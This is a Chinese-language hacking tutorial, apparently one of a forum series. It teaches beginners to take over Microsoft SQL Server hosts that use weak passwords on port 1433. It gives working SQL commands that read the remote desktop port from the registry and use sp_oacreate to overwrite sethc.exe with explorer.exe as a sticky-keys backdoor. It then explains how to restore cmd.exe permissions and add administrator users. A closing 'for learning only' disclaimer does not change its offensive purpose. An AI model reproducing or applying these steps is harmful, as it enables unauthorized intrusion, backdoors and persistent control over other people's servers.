这是我第三次发1433弱密码的教程了,前两篇教程也详细讲解了如何利用1433修复和提权,今天依然给大家带来一种利用1433弱密码提权的方法,说是高明,其实很多高手都已经用过了,本篇教程针对的是刚开始学习利用1433弱密码提权的新手,高手请忽略。
使用弱密码连接主机
随便运行一个dos命令,会看到错误信息:Error Message: xpsql.cpp: Error 5 from CreateProcess (line 737)。上一篇教程中的服务器也出现过这个错误,我们通过找到服务器上的网站,用分隔符先转小马,再转大马,绕过错误获取webshell。
这期我们就来说说这个错误产生的原因以及巧妙的修复方法,其实也可以说是绕过并提升权限的一种方法。
错误5是系统错误代码,CreateProcess表示创建线程,这个错误和系统文件cmd.exe关系密切,一种情况是cmd被删除,一种情况是cmd的权限被降低。(如果我的表述有什么不对的地方,请大家指出,这是我的理解)。
进入windows\system32目录和sql安装目录查看是否有需要的文件
cmd.exe 存在
odsole70.dll是存在的,为什么需要检查这个文件是否存在呢?因为我们后面要用到的存储过程需要用到这个文件。
我们先检查一下终端端口及其开放状态
SQL 命令输入
exec master..xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
返回成功,终端端口为78
打开3389连接命令mstsc connect IP:78,出现登录界面,证明78端口是对外开放的。
OK,现在到了关键部分,将系统的explorer文件复制到系统的shift后门文件需要两条SQL指令,下面两条语句是分开执行的,不能一起执行,我是在SQL Tools 2.0工具中执行的,你也可以在分隔符中执行,记得分开执行。
//该语句将explorer.exe复制到sethc.exe
声明@o int exec sp_oacreate'scripting.filesystemobject',@o out exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
//该语句将 sethc.exe 复制到 dllcache 目录
声明@oo int exec sp_oacreate 'scripting.filesystemobject',@oo out exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';
这两条语句执行的时间间隔不要超过10秒,否则系统会自动恢复原文件。
另外这两条语句用到的sp_oacreate存储过程需要使用odsole70.dll文件,因此该文件的存在关系到创建的成功。
[下一页]
玩过shift后门的同学一眼就能看出来这是最老套的创建shift后门的方法了,我猜看完这篇教程你们一半人都会关网页了,那就继续和剩下一半菜鸟交流吧,离开的都是高手^_^
这部分我就不截图了,直接看返回的信息就行
复制完之后我们连接3389运行shift后门试试
五次轮班结束后,界面上弹出资源管理器。
在windows\system32目录下找到cmd.exe,双击运行。
它说它没有适当的权限来运行它。右键单击 cmd.exe,转到“属性”,然后查看“安全”选项卡
会看到所有系统权限都被拒绝了,选择允许完全控制,点击应用,更改cmd的运行权限,然后双击cmd运行,接下来使用net user等命令添加用户权限。
这时候我提醒大家,如果你再运行一下sql tools里的dos命令,会发现可以正常运行,也就是说Error Message: xpsql.cpp: Error 5 from CreateProcess (line 737)这个错误是由于cmd的权限问题导致的,以后大家再遇到这样的问题就知道该怎么处理了。
OK,用刚刚添加的用户登录服务器,注意终端端口。
上篇教程有人问我服务器上没有网站怎么办。其实提权的方法有很多种,有时候单一的方法无法成功提权,可以考虑多种方法结合。好了,针对连续三期弱密码1433的提权方法我就介绍这么多了,等我学到更多的方法后再分享给大家。感谢大家耐心看完本篇教程。本教程仅供学习交流,请勿用于非法用途。
你会喜欢